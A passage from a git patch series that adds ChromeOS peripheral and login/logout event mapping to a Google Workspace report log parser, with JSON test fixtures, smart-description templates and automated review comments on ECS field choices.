Cloud/google-report/ingest/parser.yml @@ -30,6 +30,8 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "vault"}}' - name: set_saml_fields filter: '{{ json_event.message.id.applicationName == "saml"}}' + - name: set_chrome_fields + filter: '{{ json_event.message.id.applicationName == "chrome"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' 
@@ -278,3 +280,21 @@ stages:
event.type: ["denied"]
event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}'
filter: '{{ json_event.message.events[0].name == "login_failure"}}'
+
+ set_chrome_fields:
+ actions:
+ - set:
+ event.category: ["web"]
+ organization.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ORG_UNIT_NAME" %}{{param.value}}{% endif %}{% endfor %}'
+ event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "EVENT_REASON" %}{{param.value}}{% endif %}{% endfor %}'
+ device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}'
+ device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}'
+ device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}'
+
+ - set:
+ event.type: ["change"]
+ filter: '{{ json_event.message.events[0].name == "CHROMEOS_PERIPHERAL_STATUS_UPDATED"}}'
+
+ - set:
+ event.type: ["connection"]
+ filter: '{{ json_event.message.events[0].name in ["CHROME_OS_LOGOUT_EVENT", "CHROME_OS_LOGIN_EVENT"]}}'
diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json
new file mode 100644
index 000000000..36c42d3d5
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json
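Review bot: The unconditional `set` fills `device.id` from `PRODUCT_ID` and `device.model.identifier` from `DEVICE_NAME`, while `DIRECTORY_DEVICE_ID`, the one parameter present in both new test samples that identifies the ChromeOS device itself, is never mapped; the later hunk `@@ -287,9 +287,11 @@` in commit 053 re-homes these fields but still leaves it out. One line covers it: `device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DIRECTORY_DEVICE_ID" %}{{param.value}}{% endif %}{% endfor %}'`. Separately, `event.category: ["web"]` with `event.type: ["connection"]` for CHROME_OS_LOGIN_EVENT and CHROME_OS_LOGOUT_EVENT keeps these sign-in events invisible to detection rules that key on ECS `authentication` with `start`/`end`; if a later `set` action overrides a field set by an earlier one in this engine (not visible in the hunk), the last action could be split as below, with the two test fixtures updated to match. Test sample 2 expects no `device.id` or `device.model.name` key, so an empty Jinja loop result is presumably dropped rather than stored as `""`; a short comment above the action saying so would spare the next reader checking.
```yaml
      # … unchanged: first set action (organization.name, event.reason, device.*) …
      - set:
          event.type: ["change"]
        filter: '{{ json_event.message.events[0].name == "CHROMEOS_PERIPHERAL_STATUS_UPDATED"}}'

      - set:
          event.category: ["authentication"]
          event.type: ["start"]
        filter: '{{ json_event.message.events[0].name == "CHROME_OS_LOGIN_EVENT"}}'

      - set:
          event.category: ["authentication"]
          event.type: ["end"]
        filter: '{{ json_event.message.events[0].name == "CHROME_OS_LOGOUT_EVENT"}}'
```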
@@ -0,0 +1,47 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}" + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", + "event": { + "action": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "type": [ + "change" + ] + }, + "@timestamp": "2024-11-08T13:17:42.050000Z", + "cloud": { + "account": { + "id": "C01x70000" + } + }, + "device": { + "id": "0x2", + "model": { + "identifier": "S5NXNZ00A000000", + "name": "2.0 root hub" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097979777777" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json new file mode 100644 index 000000000..49574fa28 --- /dev/null +++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json 
@@ -0,0 +1,45 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}" + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 
16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", + "event": { + "action": "CHROME_OS_LOGIN_EVENT", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_KIOSK_SESSION_LOGIN", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-08T13:20:40Z", + "cloud": { + "account": { + "id": "C01x7c000" + } + }, + "device": { + "model": { + "identifier": "S5NXNZ00A000000" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097973333333333" + } + } +} \ No newline at end of file From 3221f63e4467bb80d815c9e37e2ce48f95f74b44 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 16:27:24 +0100 Subject: [PATCH 049/150] Apply linter --- Google Cloud/google-report/ingest/parser.yml | 2 +- Google Cloud/google-report/tests/test_chrome_sample_1.json | 4 ++-- Google Cloud/google-report/tests/test_chrome_sample_2.json | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index c92e4bf32..2dde85fdb 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -290,7 +290,7 @@ stages: device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}' device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}' device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}' - + - set: event.type: ["change"] filter: '{{ json_event.message.events[0].name == "CHROMEOS_PERIPHERAL_STATUS_UPDATED"}}' 
diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json index 36c42d3d5..e0e145d54 100644 --- a/Google Cloud/google-report/tests/test_chrome_sample_1.json +++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 
16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}" + } }, "expected": { "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json index 49574fa28..ecbf27de3 100644 --- a/Google Cloud/google-report/tests/test_chrome_sample_2.json +++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}" 
+ } }, "expected": { "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", From f2dd3b05166600bb2e7e6a91ba6fc89cbbc6e400 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 15 Nov 2024 16:44:12 +0100 Subject: [PATCH 050/150] Fix smart desc --- Google Cloud/google-report/_meta/smart-descriptions.json | 8 +++++++- Google Cloud/google-report/ingest/parser.yml | 2 +- 2 files changed, 8 insertions(+), 2 deletions(-) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 82e74ecd7..b58cf816e 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -174,6 +174,13 @@ { "field": "network.application", "value": "context_aware_access" + }, + { + "field": "google.report.access.application" + } + ] + }, + { "value": "The {google.report.rule.type} action was completed with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}", "conditions": [ { 
@@ -263,7 +270,6 @@ "field": "event.action" }, { - "field": "google.report.access.application" "field": "google.report.saml.application_name" } ] diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index f3b54b479..f928e2148 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -272,7 +272,7 @@ stages: event.type: ["denied"] device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_DEVICE_ID" %}{{param.value}}{% endif %}{% endfor %}' google.report.access.application: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_APPLICATION" %}{{param.value}}{% endif %}{% endfor %}' - + set_rules_fields: actions: - set: From 1e5f81194e4fe8d0f69df8ea7d743b39d35fd469 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Mon, 18 Nov 2024 10:47:49 +0100 Subject: [PATCH 051/150] Fix smart desc --- Google Cloud/google-report/_meta/smart-descriptions.json | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index b58cf816e..c1a559ed7 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -177,6 +177,12 @@ }, { "field": "google.report.access.application" + }, + { + "field": "user.email" + }, + { + "field": "event.action" } ] }, From 7478edd763b6ef7828fbc8cbf8e481b7aa1c2b1b Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Mon, 18 Nov 2024 11:27:09 +0100 Subject: [PATCH 052/150] Fix smart desc --- .../_meta/smart-descriptions.json | 22 ------------------- 1 file changed, 22 deletions(-) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index c1a559ed7..a25527ef8 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json 
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -293,9 +293,6 @@ }, { "field": "user.email" - }, - { - "field": "google.report.saml.application_name" } ] }, @@ -334,25 +331,6 @@ } ] }, - { - "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", - "conditions": [ - { - "field": "network.application", - "value": "saml" - }, - { - "field": "event.action", - "value": "login_failure" - }, - { - "field": "user.email" - }, - { - "field": "google.report.saml.application_name" - } - ] - }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ From 65af5b12298e7c7884511b6f93260bf41fbc2b8b Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Mon, 18 Nov 2024 11:41:54 +0100 Subject: [PATCH 053/150] Add some modification to the parser --- .../google-report/_meta/smart-descriptions.json | 4 ++-- Google Cloud/google-report/ingest/parser.yml | 6 ++++-- .../google-report/tests/test_chrome_sample_1.json | 10 ++++++++-- .../google-report/tests/test_chrome_sample_2.json | 7 ++++--- 4 files changed, 18 insertions(+), 9 deletions(-) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 0ac5acfe5..0c49ccdf8 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -283,7 +283,7 @@ ] }, { - "value": "Device {device.model.name} with ID {device.id} is {event.action} in the {network.application} application", + "value": "Device {device.model.name} with model ID {device.model.identifier} is {event.action} in the {network.application} application", "conditions": [ { "field": "network.application", @@ -297,7 +297,7 @@ "field": "device.model.name" }, { - "field": "device.id" + "field": "device.model.identifier" } ] }, 
diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index 2dde85fdb..e15db634e 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -287,9 +287,11 @@ stages: event.category: ["web"] organization.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ORG_UNIT_NAME" %}{{param.value}}{% endif %}{% endfor %}' event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "EVENT_REASON" %}{{param.value}}{% endif %}{% endfor %}' - device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}' - device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}' + device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}' + host.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}' device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}' + device.manufacturer: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "VENDOR_NAME" %}{{param.value}}{% endif %}{% endfor %}' + host.os.full: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_PLATFORM" %}{{param.value}}{% endif %}{% endfor %}' - set: event.type: ["change"] diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json index e0e145d54..6567eebf1 100644 --- a/Google Cloud/google-report/tests/test_chrome_sample_1.json 
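Review bot: After `@@ -287,9 +287,11 @@`, `device.model.identifier`, `device.model.name` and `device.manufacturer` come from `PRODUCT_ID`, `PRODUCT_NAME` and `VENDOR_NAME`, which in test_chrome_sample_1 describe the USB peripheral (`0x2`, `2.0 root hub`, `Linux Foundation`), while `host.name` and `host.os.full` now describe the ChromeOS device, so a single event carries two different assets under two ECS field sets that both read as "the device". If `device.*` is meant to be the managed endpoint, the peripheral attributes belong in a vendor namespace (under `google.report.*`, declared in `_meta/fields.yml`); if the current split is intended, a comment above the action such as `# device.* describes the peripheral reported by CHROMEOS_PERIPHERAL_STATUS_UPDATED; host.* is the ChromeOS device` would save the next reader the same confusion. `DEVICE_NAME` holds a serial-looking value (`S5NXNZ00A000000`), which suggests `host.id` alongside `host.name`, but that depends on how these devices are named elsewhere in the tenant. The enclosing `set_chrome_fields` stage continues below the hunk.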
+++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json @@ -28,12 +28,18 @@ } }, "device": { - "id": "0x2", + "manufacturer": "Linux Foundation", "model": { - "identifier": "S5NXNZ00A000000", + "identifier": "0x2", "name": "2.0 root hub" } }, + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" + } + }, "network": { "application": "chrome" }, diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json index ecbf27de3..990b7f47c 100644 --- a/Google Cloud/google-report/tests/test_chrome_sample_2.json +++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json @@ -27,9 +27,10 @@ "id": "C01x7c000" } }, - "device": { - "model": { - "identifier": "S5NXNZ00A000000" + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" } }, "network": { From 4c329f6eb9002b66e9c6bef52e60f7c1c340ecf0 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Mon, 18 Nov 2024 12:27:34 +0100 Subject: [PATCH 054/150] Fix smart desc --- .../_meta/smart-descriptions.json | 32 +++++++++++++++++-- 1 file changed, 30 insertions(+), 2 deletions(-) diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 66d518071..81622bd9b 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -352,7 +352,7 @@ ] }, { - "value": "The user on device model {device.model.name} logged out due to {event.reason}", + "value": "The user with ID {user.id} on the {device.model.name} device logged out due to: {event.reason}", "conditions": [ { "field": "network.application", 
@@ -367,11 +367,14 @@
       },
       {
         "field": "device.model.name"
+      },
+      {
+        "field": "user.id"
       }
     ]
   },
   {
